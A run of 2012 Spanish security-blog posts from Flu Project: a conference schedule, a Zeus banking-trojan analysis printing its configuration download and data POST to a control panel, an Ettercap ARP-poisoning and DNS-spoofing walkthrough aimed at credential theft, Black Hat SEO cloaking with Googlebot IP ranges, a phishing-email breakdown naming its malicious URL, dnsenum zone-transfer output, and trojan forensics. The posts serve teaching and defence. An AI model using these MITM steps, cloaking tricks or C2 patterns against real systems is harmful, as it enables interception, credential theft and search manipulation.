29 feb 2012

¡Mañana comienza la fiesta, arranca la Rooted Con 2012!

 

Buenas a todos, mañana comienza la Rooted Con 2012, unos días para disfrutar con amigos amantes de la seguridad de buenas ponencias, novedades, buenas comilonas, y sobre todo... ¡conchas codan!

Mañana también estrenamos nuestra 4ª temporada de camisetas :) Si os gustan, las podréis adquirir directamente en el stand que hay instalado en la Rooted Con, para ayudarnos a subvencionar el proyecto Flu.

Os dejamos a continuación con el calendario de ponencias:

Jueves, 1 de Marzo de 2012

09:00 - 10:00RECEPCIÓN Día 1
10:00 - 10:20Organización RootedCONKeynote Rooted CON 2012
10:20 - 11:10Guillermo Grande y Alberto OrtegaBuilding an IP reputation engine, tracking the miscreants
11:10 - 11:40Luis DelgadoXMPP, algo más que chat
11:40 - 12:00DESCANSO
12:00 - 13:00José Miguel Esparza y Mikel GastesiSocial Engineering in Banking Trojans: Attacking the weakest link
13:00 - 14:00Juan GarridoCorporate Forensics. Saca partido a tu arquitectura
14:00 - 15:30DESCANSO
15:30 - 16:00EpsylonXSSer - the cross site scripting framework
16:00 - 17:00Yago JesúsApplied Cryptography FAILs
17:00 - 17:20DESCANSO
17:20 - 18:20Pedro SánchezHospital Central. Historia de una extorsión
18:20 - 19:20RootedPanel IFuerzas y Cuerpos de Seguridad del Estado
19:20 - 19:30CLAUSURA Día 1

Viernes, 2 de Marzo de 2012

09:00 - 10:00RECEPCIÓN MAÑANA Día 2
10:00 - 10:50Gerardo García PeñaEnfoque práctico a la denegación de servicio
10:50 - 11:40Lorenzo MartínezWelcome to your secure /home, $user
11:40 - 12:00DESCANSO
12:00 - 13:00Carlos Díaz y Fco. Jesús GómezCMD: Look who's talking too
13:00 - 14:00Jaime PeñalbaLive Free or Die Hacking
14:00 - 15:30DESCANSO
15:30 - 16:30Eloi Sanfélix y Javier MorenoHardware hacking on your couch
16:30 - 17:00Pablo San EmeterioWHF - Windows Hooking Framework
17:00 - 17:20DESCANSO
17:20 - 18:20Chema Alonso y Manu "The Sur"Owning "bad" guys {and mafia} with Javascript botnets
18:20 - 19:20RootedPanel IIComunidad de seguridad
19:20 - 19:30CLAUSURA Día 2

Sábado, 3 de Marzo de 2012

09:00 - 10:00RECEPCIÓN Día 3
10:00 - 10:50José Picó y David PérezNuevos escenarios de ataque con estación basefalsa GSM/GPRS
10:50 - 11:40Sebastián GuerreroPimp Your Android
11:40 - 12:00DESCANSO
12:00 - 13:00Ricardo J. RodríguezMejora en el Proceso de Desempacado usando Técnicas DBI
13:00 - 14:00Hugo TesoInguma 0.5 - Red Wagon
14:00 - 15:30DESCANSO
15:30 - 16:00RootedForge 2012
16:00 - 16:50Manu Quintans y Frank RuizAll Your Crimeware Are Belong To Us!
16:50 - 17:10DESCANSO
17:10 - 18:30Raúl Siles y José A. GuaschSeguridad de aplicaciones web basadas en el DNIe
18:30 - 19:00Organización RootedCONPremios CTF
19:00 - 19:10CLAUSURA Rooted CON 2012

Nos vemos mañana, saludos!

28 feb 2012

Herramientas forense para ser un buen CSI. Parte V

Buenas a todos, en el pasado artículo de la cadena sobre herramientas forense hablamos del software Process Monitor de sysinternals. Hoy os traemos un vídeo en el que analizaremos el comportamiento de Flu en un sistema operativo Windows 7, enviando distintas instrucciones a la máquina infectada, y observando las llamadas que realiza a l sistema.
Disfrutadlo:
Saludos!

27 feb 2012

Detrás de un panel de Zeus

Hola!

Muy buenas a todos/as!

Existe un grupo determinado de troyanos que se dedican al Home banking, la banca electrónica. Algunos actúan como Keyloguer, capturan los datos introducidos por el usuario y estos datos son enviados a un panel web, enviados por correo etc..

Otro tipos de troyanos interactúan directamente con la Banca, solicitan los datos al usuario y, además conducen al usuario a la web legítima sin que este se percate de lo ocurrido. Este tipo de infecciones pueden venir a través de correo electrónico o pueden haber páginas webs maliciosas que contengan enlaces a software malicioso.

En este caso hay una máquina virtual con un software creado con un Builder del troyano Zeus.

Estos Builder cargan una configuración al binario, de donde ha de enviar los datos, el nombre del binario.. etc  Este software lo distribuyen mediante diferentes vías y consiguen infectar usuarios que envían los datos donde el criminal tenga un panel web esperando la recogida de información.

En la máquina Windows XP que está infectada con Zeus, el cambio en el sistema de archivos que ha hecho el troyano, lo mas significativo es:

El binario se ha hecho una copia y guardado en la carpeta Datos de Programa, entre otras cosas.

En las conexiones de red, el troyano intentará conectarse con el panel de control que el criminal haya configurado con el Builder y descargarse la configuración.

GET /mm.bin HTTP/1.1Accept: */*Connection: CloseUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322)Host: ejemplo.ruCache-Control: no-cache

El troyano se descarga la configuración que analizaremos en otro artículo.

También podemos ver como envía los datos al panel

POST /panel/acc.php HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322)Host: ejemplo.ruContent-Length: 387Connection: Keep-AliveCache-Control: no-cache

Ahora extraeremos los datos mediante strings del fichero así podemos ver algo de información del binario.

Aquí tenemos la cabecera de los strings extraídos:

!This program cannot be run in DOS mode.RichUPX0UPX1.rsrc3.03

Se puede ver que el troyano ha sido tratado con un packer estos packer dificultan el análisis por parte de los reversers. UPX es un compresor Open Source, pero en el caso de Malware se usa una versión modificada que dificulta la ingeniería inversa.

Seguramente el Builder lo lleva incorporado.

Hay mas cadenas interesantes que se pueden extraer del binario en cuestión:

XPTPSWKERNEL32.DLLadvapi32.dlluser32.dllLoadLibraryAGetProcAddressVirtualProtectVirtualAllocVirtualFreeExitProcessRegCloseKeyFlashWindowEx$/x76Rg)$\!`7y5Gaz

Vaya, dll propias de sistema que interactúan con el troyano..

En el panel existen estos puertos abiertos:

22/tcp open ssh syn-ack25/tcp open smtp syn-ack80/tcp open http syn-ack111/tcp open rpcbind syn-ack427/tcp open svrloc syn-ack631/tcp open ipp syn-ack1720/tcp filtered H.323/Q.931 no-response2000/tcp filtered cisco-sccp no-response5060/tcp filtered sip no-response

En el siguiente capítulo seguiremos tratando con este troyano, espero que os haya gustado.

Saludos!!

26 feb 2012

Informe Flu - 60

Comenzamos con el resumen de la semana:

Lunes 20 de Febrero

Martes 21 de Febrero

Miércoles 22 de Febrero

Jueves 23 de Febrero

Viernes 24 de Febrero

Sábado 25 de Febrero

25 feb 2012

¿Qué partidos políticos actualizan más sus Wordpress?

Buenas a todos, como sabéis, desde hace unos meses algunos compañeros de Flu Project estamos desarrollando en nuestros ratos libres (que por desgracia no son muchos) la herramienta Flunym0us (entre otras), un escáner de vulnerabilidades para auditar la seguridad de nuestras aplicaciones desarrolladas sobre las plataformas Wordpress y Moodle. En estos momentos le estamos añadiendo nuevas funcionalidades y pronto esperamos poder publicar una versión 1.1. Mientras tanto, me gustaría hablaros hoy del archivo "readme.html".

¿Qué es el archivo readme.html?

Este archivo, se crea por defecto en todas las instalaciones de Wordpress y nos ofrece información sobre la versión de Wordpress que tenemos instalada. Como se trata de un archivo con extensión html, es linkable públicamente. ¿Cuántos de los que utilizáis Wordpress habéis eliminado este archivo después de instalar y/o actualizarlo a una nueva versión? ¿Tantos...? :-)

Ya sabéis que durante un proceso de auditoría de seguridad, mostrar información acerca de la versión utilizada de una herramienta es suficiente para que mediante una sencilla búsqueda en Internet se obtengan listados de exploits para vulnerar los bugs que padezcan.

Flunym0us, entre otras funcionalidades, extraerá la versión de Wordpress de este archivo.

He querido hacer algunas pruebas con varios wordpress para comprobar si los administradores/desarrolladores suelen eliminar este archivo, y de los más de 30 wordpress que he probado, todos conservan este fichero.

Para la búsqueda de los wordpress he utilizado el verbo "inurl" de Google. Entre esos 30 wordpress había varias páginas Web de partidos políticos. He seleccionado "al azar" dos del PP y dos del PSOE y me ha parecido interesante contestaros a la pregunta que seguro muchos os habréis hecho ahora, ¿quiénes actualizan más sus wordpress, los administradores de páginas de políticos de un color o los de otro? Aquí la respuesta:

Saludos!

24 feb 2012

Técnicas Black (Hat) Seo: Como llegar a ser popular en clase (I de III)

Buenas a todos, atrás quedaron los tiempos en los que para ser popular en clase bastaba con quitarles el bocadillo a los compañeros, comer chicle mientras la profesora dictaba la lección o jugar bien al futbol, ahora basta con llevar los pantalones por las rodillas, ir a clase con una gorra para arriba y un piercing en la boca. Las cosas han cambiado, y ya no hace falta forjarse una reputación durante una larga historia para estar en el podio del estrellato, ahora basta con conocer algunas técnicas oscuras, unos sencillos trucos y obtener los mismos beneficios en un corto plazo de tiempo, ¡hemos encontrado la marmita de Panoramix! Y no, no me refiero a ponerme los pantalones de "caganet" ni a cambiar mi look & feel (como diría la gente de marketing...), me refiero al uso de las técnicas de Black Hat Seo para aumentar nuestra reputación en Internet, y por supuesto, siguiendo la Ley del mínimo esfuerzo, que para eso somos "jakers" ¿no?.

Bromas a parte, en la cadena de artículos que hoy damos comienzo vamos a tratar de analizar que es el Black Seo o Black Hat Seo y que técnicas comprende esta metodología (por darle un nombre técnico) para aumentar la reputación en Internet de un Sitio Web.

El objetivo principal de estas técnicas es el de ganar posiciones en los buscadores, un objetivo claro y sencillo pero para cuya consecución hace falta desplegar todo un arsenal de trucos, jugadas y tretas que bien podrían haber salido de un capitulo de El Arte de la Guerra. Hay que tener en cuenta que estas técnicas tienen su parte negativa, y si no se realizan con cuidado pueden traer más contras que pros, afectando a la imágen de la organización propietaria del sitio y recibiendo penalizaciones por parte de los buscadores web.

Hoy en día son miles los sitios web que hacen uso de estas técnicas para ganar dinero, sobretodo con publicidad, tal es el caso de páginas de Tarot, de contenido adulto, de juegos online, y un largo etcétera. El black seo está a la orden del dia.

Una de las técnicas más utilizadas es la del Cloaking. Esta técnica consiste en presentar una página distinta a los bots/crawlers de los buscadores, de la que se le presenta a los usuarios. El Cloaking ya ha sido usada por algunas de las compañías más prestigiosas del mundo, como BMW, aunque por pasarse de listos les acabaron penalizando. El motivo fue que BMW publicó en su sitio Web numerosas palabras clave ocultas en etiquetas y repetidas hasta 30 veces cada una, lo que les ayudó a ganar numerosas visitas en poco tiempo (hasta que fueron descubiertos y penalizados por Google).

Para hacer uso de la técnica de Cloaking se suele tener un listado con todas las direcciones IP de los crawlers que utilizan los buscadores, y cuando uno de estos bots solicita la página web, se le devuelve una página "especial" y optimizada para aumentar el Page Rank.

A continuación os dejo las direcciones IP de los Googlebots que se encuentran circulando por los rincones más recónditos de Internet:

209.185.108209.185.253209.85.238216.239.33216.239.37216.239.39216.239.41216.239.45216.239.46216.239.51216.239.53216.239.57216.239.59216.33.22964.233.17364.68.8064.68.8164.68.8264.68.8364.68.8464.68.8564.68.8664.68.8764.68.8864.68.8964.68.9064.68.9164.68.9266.24972.14.1998.6.48

Otra técnica bastante conocida es la del ocultamiento de texto. Consiste en añadir texto de manera oculta en la página mediante CSS. Éste truco ya no tiene éxito debido a que los bots son ya capaces de detectarlo, pero lo que si se puede hacer es colocar texto con el mismo color que el fondo de la página.

El próximo día analizaremos nuevas técnicas, saludos!

23 feb 2012

Detección de intrusiones en aplicaciones web (Parte I )

¿Qué son los sistemas de detección de intrusiones? ¿Qué tipos hay? ¿Qué son los cortafuegos de aplicación web? A estas y otras preguntas son las que da respuesta este post.

Los sistemas de detección de intrusiones (IDS del inglés Intrusion Detection Systems) analizan la información de un ordenador o de la red para detectar acciones maliciosas o comportamientos que puedan comprometer la seguridad de un sistema.

Los IDS se pueden clasificar atendiendo a diferentes criterios.

En primer lugar distinguiremos entre IDS e IPS (Intrusion Prevention System).

Como su nombre indica, los IDS detectan los ataques y lanzan una alarma en caso de detección, pero no impiden que el ataque tenga lugar. De esta manera, se dice que los IDS son pasivos. En contraposición, los IPS son activos y reaccionan ante los ataques, parándolos o modificándolos cuando son detectados, de manera que se impida que el sistema a proteger pueda quedar comprometido. El inconveniente de los IPS es que son capaces de cortar conexiones para que el ataque no tenga éxito. Esto supone que ciertos activos no estén disponibles, lo que puede suponer un problema en algunas ocasiones.

En segundo lugar, los IDS se pueden clasificar atendiendo a su localización. En este caso se habla de HIDS (Host IDS) y NIDS (Network IDS). Los HIDS protegen una máquina dada. Generalmente lo hacen examinando determinados parámetros del sistema operativo y del comportamiento del usuario tales como el uso de CPU y memoria, intentos fallidos de login, monitorización de logs y del sistema de ficheros, etc. Son más adecuados para combatir amenazas internas.

Por otra parte, los NIDS capturan y analizan todo el tráfico de un segmento de red en busca de actividad maliciosa, detectando los ataques que procedan desde el exterior.

En muchos de los casos, lo ideal para proteger un sistema es utilizar una solución combinada con HIDS y NIDS.

Por último, repasaremos la clasificación atendiendo a su modo de funcionamiento. Típicamente se diferencia entre sistemas basados en firmas y basados en anomalías.

Los sistemas basados en firmas buscan firmas de ataques conocidos en una base de datos de firmas usando técnicas de encaje de patrones. Dicha base de datos debe mantenerse adecuadamente actualizada. La principal desventaja de este enfoque es que no es capaz de detectar ataques nuevos que no estén registrados en la base de datos.

El enfoque basado en anomalías soluciona el problema anterior debido a que define un modelo del comportamiento normal del sistema.  Una vez que está definido, los comportamientos anómalos se consideran como sospechosos de intrusión. De esta manera es posible detectar nuevos ataques. La desventaja de estos enfoques radica en la dificultad de definir con precisión el comportamiento normal del sistema.

Sin embargo, estos sistemas tienden a dar más falsos positivos (FP), es decir, falsas alarmas. Uno de los grandes retos de los IDS es el de reducir al máximo el número de falsos positivos, a la vez que se maximiza la tasa de ataques detectados.

Como se ha mencionado anteriormente, los NIDS suelen trabajar con tráfico de red en general.

Estos sistemas pueden detectar un gran número de ataques, sin embargo no son suficientes para cuando se trata de la detección de ataques web.

Hoy en día las aplicaciones web forman, cada vez más, parte de nuestras vidas y están expuestas a una gran cantidad de amenazas. Esto unido al hecho de que cada día surgen nuevos ataques web, hace que resulte de gran importancia la toma de medidas de seguridad para proteger adecuadamente nuestras aplicaciones web.

Los cortafuegos de aplicación web (WAF -  del inglés Web Application Firewall) son herramientas que trabajan a nivel de aplicación analizando el tráfico HTTP en busca de tráfico malicioso que pueda poner en compromiso el sistema. Por tanto, son adecuados para ayudar a proteger contra los ataques web.

Hasta aquí este primer post sobre el tema, que se seguirá ampliando en próximas ocasiones.

Espero que os haya sido de utilidad.

Gracias y saludos!

Carmen Torrano

22 feb 2012

Nuevo intento de Phising a Caja España

Buenas a todos, raro es el mes que no recibo en el buzón de alguna de mis cuentas de correo electrónico un email de phising de algún banco o caja que intenta engañarnos para que introduzcamos en alguna página suplantada nuestros datos bancarios.

En el blog de Flu Project ya os hemos mostrado numerosos casos de phising, algunos más logrados que otros. El que hoy os mostramos es uno de los intentos de phising más pobres que he visto en los últimos meses. A continuación os dejo una captura de pantalla:

Si analizamos el correo brevemente podríamos sacar las siguientes conclusiones:

  • Normalmente estos correos suelen suplantar la dirección de origen del correo por una que simule salir de los servidores de correo de la compañía, pero como podéis ver, poco se han molestado en esta tarea: Cajaespana@www4.base.datos.actualizar-banco.net.
  • Por otro lado, esta vez si que parece que el correo ha sido redactado por una persona que domina el castellano (normalmente suelen ser traduciones algo malas y con símbolos extraños).
  • El correo solo contiene texto plano (a excepción del link del final). No trae logotipos de la compañía.
  • Si pasáis el ratón por el link al www.cajaespana.es/servicios/cliente, nos lleva a una dirección totalmente distinta donde se encontraría la página maliciosa: secinfo.debtsettlementhawaii.com/.nu/nu.php.
No os fieis de los emails y ante la duda, siempre contrastar la información llamando a la compañía.saludos! 

21 feb 2012

Pantalla Pública V

Buenas a todos, volvemos a la carga con el quinto post de la cadena sobre Pantallas Públicas con tres nuevos cazados que nos habíes enviado por email,¡ gracias!

La primera pantalla pública de hoy nos la envía Luis desde Tenerife. Esta pantalla es de una máquina (a monedas) que utilizan para jugar a diferentes juegos en el centro comercial Gran Sur en Adeje:

La siguiente pantalla pública nos la envía Alejandro Suárez. En ella se puede ver un Windows XP en una pantalla colocada verticalmente. Me he encontrado ya varias pantallas públicas similares en tiendas Vodafone, que tienen una televisión colocada verticalmente simulando ser un móvil gigante:

La tercera pantalla pública de hoy la reservamos al igual que en la anterior entrega para recordaros otra pantalla cazada bastante llamativa de hace un par de años. Se trata de uno de los paneles de información del Estadio Santiago Bernabeu con un error de Windows:

[caption id="attachment_6085" align="aligncenter" width="491" caption="Fuente: http://catsandroids.wordpress.com/2010/10/24/doble-pantallazo-azul/"][/caption]

No dejéis de enviarnos pantallas públicas a info@flu-project.com.

Saludos!

20 feb 2012

Twitter almacena la agenda de tu teléfono

Buenas a todos, hace unos días saltó la noticia sobre los clientes de Twitter para móviles y la gestión que hacen de la información que recuperan de los mismos.

Cuando un usuario hace uso de la opción "Encontrar amigos", está subiendo sin conocimiento la agenda con sus contactos a los servidores de la compañía, información que residirá por un tiempo de 18 meses, según indica la política de privacidad.

La política de privacidad también dice lo siguiente: "A través de la configuración de la cuenta, es posible proporcionar información como facilitar el teléfono móvil para entregar SMS o la agenda de direcciones para ayudar al usuario a encontrar usuarios que conoce en Twitter", Pero no parece especificar que la opción de búsqueda de amigos lleve incluida la recuperación de nuestros contactos.

Carolyn Penner, portavoz de la red social aclaró a Los Angeles Times: "Queremos ser claros y transparentes en la comunicación con nuestros usuarios. En la próxima actualización de la aplicación, que llegará en breve, cambiaremos el término 'Encontrar amigos' por 'Escanear tus contactos' e 'Importar tus contactos', en las aplicaciones de Twitter para iPhone y Android, respectivamente".

Es importante analizar con detenimiento las políticas de privacidad de las aplicaciones. Y vosotros... ¿las leéis? Saludos! 

19 feb 2012

Informe Flu - 59

Comenzamos con el resumen de la semana:

Lunes 13 de Febrero

Martes 14 de Febrero

  • Publicamos la tercera parte de una de las cadenas de artículos que más éxito está teniendo en las últimas semanas en la que analizamos distintas utilidades que pueden ser útiles en un análisis forense. La cadena es muy larga y aún quedan muchas cosas por contaros :) Herramientas forense para ser un buen CSI. Parte III

Miércoles 15 de Febrero

Jueves 16 de Febrero

  • Marc nos muestra una de las herramientas más útiles en auditoría para el análisis de DNS, DNSEnum. Útil para contrastar la información que también podéis recuperar por ejemplo con Anubis.

Viernes 17 de Febrero

  • Jordisk nos enseña a jugar con Ettercap en la primera parte de esta interesante cadena de artículos.

Sábado 18 de Febrero

18 feb 2012

Taller sobre botnets en las XI Jornadas de Seguridad de Ia Información (SID)

Buenas a todos, el miércoles de la semana que viene he tenido el gusto de ser invitado para dar una ponencia en la XI Jornadas de Seguridad de Ia Información (SID) en Madrid. Estaré en representación del Centro Hacking de Everis con mi compañero de fatigas y amigo Pedro Cano, uno de los cracks del equipo, hablando sobre botnets. Aprovecho para agradecer al resto del equipo del Centro que ha colaborado con nosotros en la preparación de la ponencia.

No os quiero adelantar muchos datos sobre la charla, pero haremos un repaso general a la historia de las botnets y mostraremos una serie de PoC en directo con algunas de ellas, mostrando cómo se producen los procesos de configuración e infección y medidas para detectarlas y eliminarlas, además tendremos alguna que otra sorpresa durante la ponencia que ya veréis los que asistáis al taller :-). Para los que no podáis asistir intentaré enlazaros las diapositivas y vídeos en los próximos días (si las cuelgan en Internet)

Os dejo a continuación el tríptico. Nuestro taller será el miércoles de 15:30 a 17:30, es gratuito y accesible a todo el mundo (lo que no os puedo garantizar es que haya plazas libres ya que el aforo es limitado):

Ver tríptico

Nos vemos el miércoles, ¡saludos!

17 feb 2012

Jugando con Ettercap (Parte I de III)

Buenas a todos, en el artículo de hoy vamos a tratar con ettercap, una aplicación muy potente y tremendamente útil pero de la que en este blog solo se ha hablado en un post.

Para hacer las pruebas utilizaremos un par de máquinas virtuales, una de ellas con Backtrack y otra con Windows XP. Supongo que no hace falta decir cuál será la máquina atacante y cual la víctima :)

Para empezar vamos a buscar y editar el archivo etter.dns por si luego decidimos suplantar alguna web. En este ejemplo editamos el archivo para que las peticiones DNS a twitter.com devuelvan nuestra ip y no la real del servidor de twitter.

El siguiente paso es, directamente realizar el ataque MiTM incluyendo el plugin dns_spoof. El parámetro  -Tq                simplemente indica cómo queremos ver los datos en pantalla, -i para especificar la interfaz a usar, -M arp para envenenar las tablas ARP y por último las  // // indican a que equipos queremos modificarles las tablas arp. Si quisiéramos atacar solo a un equipo o un rango entre las dos primeras //  escribiríamos el rango o IP concreta y lo mismo para el caso del router pero en las segunas //. Si el ataque quiere realizarse a toda la red basta con hacerlo tal y como se muestra en la imagen.

Para comprobar si se han envenenado las tablas ARP correctamente, nos vamos a nuestra máquina víctima y desde la consola de comandos y tecleamos “arp –a”.

La primera consulta a las tablas se hizo antes de ejecutar ettercap y por tanto el equipo atacante y el router tienen MACs diferentes. En la segunda consulta tanto el router como la máquina con Backtrack tienen la misma dirección física por lo que el envenenamiento se ha hecho de forma correcta.

La próxima semana veremos cómo darle uso al plugin dns_spoof y gracias a las falsas respuestas dns, robar credenciales o conseguir el control sobre el otro equipo.

16 feb 2012

Pentesting al DNS, dnsenum

Hola!

Muy buenas a todos/as!

“La información es poder”, y que razón tenía Francis BACON al decir esta frase. Cuando realizas una auditoría, siempre tenemos el primero apartado, el apartado de Fingerprinting, en el cual se comprueba entre otras cosas que información pública contiene el target objetivo.

Una de las cosas que se pueden mirar es la versión del DNS, y es por eso que existen herramientas como dnsenum que te facilitan esta tarea.

dnsenum evalúa:

1) Get the host’s addresse (A record).

2) Get the namservers (threaded).

3) Get the MX record (threaded).

4) Perform axfr queries on nameservers and get BIND versions(threaded).

5) Get extra names and subdomains via google scraping (google query = “allinurl: -www site:domain”).

6) Brute force subdomains from file, can also perform recursion on subdomain that have NS records (all threaded).

7) Calculate C class domain network ranges and perform whois queries on them (threaded).

8) Perform reverse lookups on netranges ( C class or/and whois netranges) (threaded).

9) Write to domain_ips.txt file ip-blocks.

Nos sirve perfectamente para hacer las pruebas que necesitamos.

La herramienta la podemos descargar por SVN de aquí: dnsenum

Para hacerla funcionar hará falta que se instalen los siguiente módulos cpan:

Necesarios:Net::IPNet::DNSNet::NetmaskOpcionales:Net::Whois::IPHTML::ParserWWW::MechanizeXML::Writer

Una vez tengamos los requisitos necesarios podemos empezar a usar la aplicación, pondré tres ejemplos.

Host que NO permite trasferencia de zona:

Para lanzar dnsenum

perl dnsenum.pl xubuntu.com

dnsenum.pl VERSION:1.2.2

—– xubuntu.com —–Host’s addresses:__________________xubuntu.com 600 IN A 91.189.90.40xubuntu.com 600 IN A 91.189.90.41xubuntu.com 600 IN A 91.189.89.88Name Servers:______________ns1.canonical.com 147710 IN A 91.189.94.173ns2.canonical.com 147528 IN A 91.189.94.219ns3.canonical.com 126351 IN A 209.6.3.210Mail (MX) Servers:___________________ Trying Zone Transfers and getting Bind Versions:_________________________________________________Trying Zone Transfer for xubuntu.com on ns1.canonical.com …AXFR record query failed: NOERRORns1.canonical.com Bind Version: 9.7.3Trying Zone Transfer for xubuntu.com on ns3.canonical.com …AXFR record query failed: NOERRORns3.canonical.com Bind Version: 9.7.3Trying Zone Transfer for xubuntu.com on ns2.canonical.com …AXFR record query failed: NOERRORns2.canonical.com Bind Version: 9.7.3Wildcards detected, all subdomains will point to the same IP address, bye.

Podemos ver que ha conseguido extraer la información del BIND pero no permite trasferencia de Zona.

Hagamos otra comprobación:

perl dnsenum.pl gnu.org

dnsenum.pl VERSION:1.2.2

—– gnu.org —–Host’s addresses:__________________gnu.org 300 IN A 140.186.70.148Name Servers:______________ns2.gnu.org 300 IN A 87.98.253.102ns1.gnu.org 300 IN A 140.186.70.164ns3.gnu.org 300 IN A 46.43.37.70Mail (MX) Servers:___________________eggs.gnu.org 300 IN A 140.186.70.92Trying Zone Transfers and getting Bind Versions:_________________________________________________Trying Zone Transfer for gnu.org on ns2.gnu.org …gnu.org 300 IN SOAgnu.org 300 IN A 140.186.70.148gnu.org 300 IN TXTgnu.org 300 IN MXgnu.org 300 IN NSgnu.org 300 IN NSgnu.org 300 IN NSgnu.org 300 IN SSHFPalpha.gnu.org 300 IN A 140.186.70.21anoncvs.gnu.org 300 IN CNAMEarch.gnu.org 300 IN CNAMEaudio-video.gnu.org 300 IN CNAMEaudio-video-dev.gnu.org 300 IN A 140.186.70.157audio-video-dev.gnu.org 300 IN SSHFPautoconfig.gnu.org 300 IN A 140.186.70.30be.gnu.org 300 IN NSbe.gnu.org 300 IN NSftp.be.gnu.org 300 IN CNAMEwww.be.gnu.org 300 IN CNAMEbeeblebrox.gnu.org 300 IN SSHFPbugs.gnu.org 300 IN A 140.186.70.43bzr.gnu.org 300 IN CNAMEcatalyst.gnu.org 300 IN SSHFPchapters.gnu.org 300 IN A 91.121.254.230front.chapters.gnu.org 300 IN A 91.121.254.230clock.gnu.org 300 IN CNAMEwww.cn.gnu.org 300 IN A 61.152.210.194cvs.gnu.org 300 IN CNAMEdbd.gnu.org 300 IN A 140.186.70.32dbd.gnu.org 300 IN SSHFPdebbugs.gnu.org 300 IN A 140.186.70.43debbugs.gnu.org 300 IN SSHFPeggs.gnu.org 300 IN A 140.186.70.92eggs.gnu.org 300 IN SSHFPelpa.gnu.org 300 IN A 140.186.70.89elpa.gnu.org 300 IN SSHFPes.gnu.org 300 IN MXes.gnu.org 300 IN A 91.121.254.230bee.es.gnu.org 300 IN CNAMEwww.bee.es.gnu.org 300 IN CNAMEbluewall.es.gnu.org 300 IN CNAMEbussiness.es.gnu.org 300 IN CNAMEbw.es.gnu.org 300 IN CNAMEconferencias.es.gnu.org 300 IN CNAMEemacs.es.gnu.org 300 IN CNAMEwww.emacs.es.gnu.org 300 IN CNAMEempresas.es.gnu.org 300 IN CNAMEevalhackers.es.gnu.org 300 IN CNAMEftp.es.gnu.org 300 IN CNAMEghm.es.gnu.org 300 IN CNAME[...]

Podemos ver que el dominio de GNU.org permite trasferencia de zona en el DNS.

En algún DNS también nos dejan mensajes de los mas curiosos:

perl dnsenum aeat.es

—– aeat.es —–Host’s addresses:__________________aeat.es 3176 IN A 195.235.106.193Name Servers:______________esifw2.tsai.es 106 IN A 213.4.194.5esifw1.tsai.es 256 IN A 213.0.43.37Mail (MX) Servers:___________________correodeempresas.telefonica.es 300 IN A 212.170.236.87Trying Zone Transfers and getting Bind Versions:_________________________________________________Trying Zone Transfer for aeat.es on esifw1.tsai.es …AXFR record query failed: NOERROResifw1.tsai.es Bind Version: :-b

Parece ser que no quieren que miremos la versión :P

Si queréis analizar un DNS de manera automática esta herramienta os puede ayudar.

Saludos!

15 feb 2012

Herramientas forense para ser un buen CSI. Parte IV

Buenas a todos, hoy continuaremos con la cadena de artículos sobre análisis forense por donde lo dejamos ayer, cómo detectar un troyano como Flu en una máquina infectada, y como eliminarlo.
Cuando reiniciamos una máquina infectada con Flu veremos como ya no existe un proceso flu.exe, pero se ha iniciado otro proceso igual, pero con otro nombre, win_32.exe:
clip_image002
Si abrimos la ubicación original del ejecutable que genera dicho proceso, nos llevará a la ruta donde se encuentra almacenado el malware (este sencillo paso nos puede servir para detectar en que rutas se hospedan las aplicaciones maliciosas, siempre que no se encuentren ocultas por un rootkit, por ejemplo):
clip_image004
El proceso no lo podremos eliminar al encontrarse en ejecución, por lo que habrá que matarlo primero:
clip_image005
clip_image006
Como ya sabéis, Flu lleva un keylogger qué almacena las teclas pulsadas por el usuario en el siguiente fichero de texto y que se encuentra almacenado al lado del ejecutable en la carpeta del usuario, como un archivo de tipo oculto:
clip_image008
Ahora ejecutaremos el comando SYSTEMINFO, para que el bot nos devuelva la información del sistema y verificar que funciona igual que el proceso flu.exe (que ayer comentamos):
Si buscamos el comando en los eventos de la máquina, podremos ver como efectivamente lo ha ejecutado:
clip_image016
Una vez que se ha recopilado información suficiente del malware, ya estamos en disposición de eliminarlo.
Para el caso concreto del troyano Flu, para eliminarlo de la máquina lo primero que tendremos que hacer será matar el proceso que ejecuta el malware (otros troyanos más avanzados incorporan sistemas para arrancar de nuevo los procesos en caso de caida, en ese caso sería necesario detectar qué otro proceso se encarga de levantarlo para proceder a inutilizarlo):
Una vez matado el proceso, eliminaremos todos los archivos del malware que se encuentran en la carpeta del usuario sin problemas.
image
El siguiente y último paso será eliminar las claves del registro que arrancan el malware con el inicio del sistema.
clip_image023
Y ya tendremos nuestro equipo limpio!. Estos pasos son los que automatiza la vacuna de Flu que podéis descargar desde aquí.
Espero que os haya gustado el post, para próximos artículos me gustaría hablaros de otros tipos de malware y traeros nuevas herramientas, se admiten ideas y aportaciones, ya sabéis que las puertas de Flu Project están siempre abiertas ;)
saludos!

14 feb 2012

Herramientas forense para ser un buen CSI. Parte III

Buenas a todos, en el post de hoy continuaremos con la cadena de artículos sobre análisis forense, realizando un análisis de una máquina infectada con FLU para comprobar la infección y limpiarla de manera manual. Para ello haremos uso de las siguientes utilidades:
  • Taskmanager
  • Regedit
  • Process Monitor
  • Wireshark
Este caso es extrapolable a otros muchos troyanos.

En primer lugar realizaremos la infección en la máquina ejecutando el exe con el bot de Flu apuntando a localhost, donde tenemos el panel de control escuchando:

clip_image002

Un primer paso que deberíamos realizar en una máquina infectada por un malware es analizar los procesos que hay en ejecución. Para ello, abrimos el visor de procesos de Windows donde podremos ver como tenemos el proceso flu.exe en ejecución:

clip_image004

Si abrimos la herramienta Process Monitor de Sysinternals y buscamos los eventos de la máquina realizados por dicho proceso podremos ver entre otras cosas como el proceso flu.exe realiza llamadas al Net Framework, por lo que se puede deducir que se encuentra programado en .Net:


Veremos también como el proceso ha creado un archivo de texto “_debug_err_win_32.txt”, donde irá almacenando las teclas pulsadas por el usuario en la máquina infectada:


Si seguimos analizando los eventos con Process Monitor, vemos como el ejecutable ha creado la siguiente clave en el registro para ejecutar el proceso “win_32.exe” cada vez que se inicie una sesión de Windows:


Al abrir dicha clave con regedit podremos ver la ruta donde el malware ha alojado el ejecutable malicioso:


